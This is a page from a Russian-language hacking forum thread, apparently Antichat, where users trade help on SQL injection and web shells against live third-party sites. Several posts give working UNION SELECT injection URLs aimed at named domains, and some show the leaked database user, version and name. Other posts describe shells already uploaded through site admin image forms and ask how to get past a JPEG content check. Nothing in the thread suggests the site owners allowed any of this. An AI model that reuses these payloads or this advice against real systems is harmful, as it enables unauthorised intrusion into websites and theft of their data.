Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
Page 624 of 1207
  1. InfectedM

    InfectedM Elder - Старейшина

    Joined:
    4 Nov 2007
    Messages:
    155
    Likes Received:
    12
    Reputations:
    0
    PHP:
    http://www.qwerty.ru/page.php?id=-999' 
    -> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''-999''' at line 1
    PHP:
    http://www.qwerty.ru/page.php?id=1 order by 50 
    -> ошибка - :Unknown column '50' in 'order clause'
    PHP:
    http://www.qwerty.ru/page.php?id=1 order by 2 
    -> ошибка - :Unknown column '2' in 'order clause'
    PHP:
    http://www.qwerty.ru/page.php?id=1 order by 1 
    -> Грузится норм сайт...
    Получается всего 1 столбец ? 0o
    PHP:
    http://www.qwerty.ru/page.php?id=1'+union+select+0/*
    -> ошибка - :The used SELECT statements have a different number of columns
    PHP:
    http://www.qwerty.ru/page.php?id=-1+union+select+0 */
    --> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/ AND poz=1' at line 1


    подскажите плз что можно сделать?
     
    #12461 InfectedM, 22 Apr 2010
  2. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    выложи сайт полностью, посмотрим что там,или там намечается инжекция на важном государственном или военном проекте?
    P.S. вообще да, бывает такое что столбец один...
     
    #12462 547, 22 Apr 2010
  3. InfectedM

    InfectedM Elder - Старейшина

    Joined:
    4 Nov 2007
    Messages:
    155
    Likes Received:
    12
    Reputations:
    0
    http://www.procctv.ru/page.php?id=-1'
     
    #12463 InfectedM, 22 Apr 2010
  4. Root-access

    Root-access Elder - Старейшина

    Joined:
    18 Jun 2008
    Messages:
    193
    Likes Received:
    195
    Reputations:
    91

    Э, там такого скрипта вообще нет.
     
    #12464 Root-access, 22 Apr 2010
    1 person likes this.
  5. InfectedM

    InfectedM Elder - Старейшина

    Joined:
    4 Nov 2007
    Messages:
    155
    Likes Received:
    12
    Reputations:
    0
    ссылку сменил по привычке -)
    вот http://www.procctv.ru/page.php?id=-1'

    И еще давно видел прогу,аналог Sipt ,только не такая замороченная . елси кто помнит как называется отпишите плиз)
     
    #12465 InfectedM, 22 Apr 2010
  6. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    392
    Likes Received:
    694
    Reputations:
    405
    http://www.procctv.ru/page.php?id=-1+union+select+1,concat_ws(0x3a,user(),version(),database())--

    procctv@localhost:5.0.45-log:cms
     
    #12466 Ded MustD!e, 22 Apr 2010
  7. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    SQL helper v2.7 ? Их куча
     
    #12467 h00lyshit!, 22 Apr 2010
  8. ALIM

    ALIM Member

    Joined:
    20 Apr 2010
    Messages:
    60
    Likes Received:
    6
    Reputations:
    5
    Помогите докрутить скулю, нет печатного поля а все известные мне методы вывода слепых не выходят
    http://www.hoyle.com/game.php?id=-26%20or%20(1=1)%20order%20by%2025%20--
     
    #12468 ALIM, 22 Apr 2010
    Last edited: 22 Apr 2010
  9. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    Code:
    http://*****/?id=-26%20UNION%20SELECT%201,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
    version - 5.0.45
     
    #12469 Дирижабль, 22 Apr 2010
    Last edited: 22 Apr 2010
  10. InfectedM

    InfectedM Elder - Старейшина

    Joined:
    4 Nov 2007
    Messages:
    155
    Likes Received:
    12
    Reputations:
    0
    Подскажите плиз прогу для подбора каталогов ,аналог хед пельмешки ,только что бы не на перле
     
    #12470 InfectedM, 22 Apr 2010
  11. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    Может кто подскажет, залил шел через картинку, и получилас ссылка типа
    getimg.php?type=plandrawings&file=095244731.php

    кто подскажет что можно сделать?

    Поиск дирректорий типа images files и тому подобных ничего не дал!!!
     
    #12471 GOGA075, 22 Apr 2010
  12. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    ты эт через скулю залил шоль??
     
    #12472 pinch, 22 Apr 2010
  13. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    Нет, через админку, через добавление картинки.
     
    #12473 GOGA075, 22 Apr 2010
  14. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    как вытащить остальные db_name() из MS SQL 2000 ?

    Решенно! забыл просто вот так... db_name(1).. (2) итд
     
    #12474 Дирижабль, 22 Apr 2010
    Last edited: 22 Apr 2010
    1 person likes this.
  15. scorpic393

    scorpic393 Banned

    Joined:
    5 Feb 2010
    Messages:
    59
    Likes Received:
    4
    Reputations:
    3
    в админке есть возможность заливать фото, но при попытке залить шелл выскакивает ошибка Warning: imagecreatefromjpeg() [function.imagecreatefromjpeg]: '../photos/books/1271963332.php' is not a valid JPEG file in /home/agencevu/www/admin/liste_livres.php on line 281

    видимо php функция, проверяеть содержимое файла, и если не jpeg, то не заливает. я правильно понял? и можно ли какнить обойти это ограничение?
     
    #12475 scorpic393, 22 Apr 2010
  16. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    [Feldmarschall] если нет доступа то никак наверно!!!
     
    #12476 GOGA075, 22 Apr 2010
  17. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    -.-... а по серьезней можно? ок?
     
    #12477 Дирижабль, 22 Apr 2010
  18. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    если не выводятся цифры от полей на странице, даже при id=99999999 что это может быть??? пробовал делать hex(null) не катит проставил version() во все поля не выводит
     
    #12478 pinch, 22 Apr 2010
  19. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    729
    Reputations:
    948
    первый запрос до union вернул true или блинд!
     
    #12479 Strilo4ka, 22 Apr 2010
    1 person likes this.
  20. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    попробуй id=-99999999
    мб слепая
     
    _________________________
    #12480 HAXTA4OK, 22 Apr 2010
    3 people like this.
(You must log in or sign up to post here.)
Page 624 of 1207
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.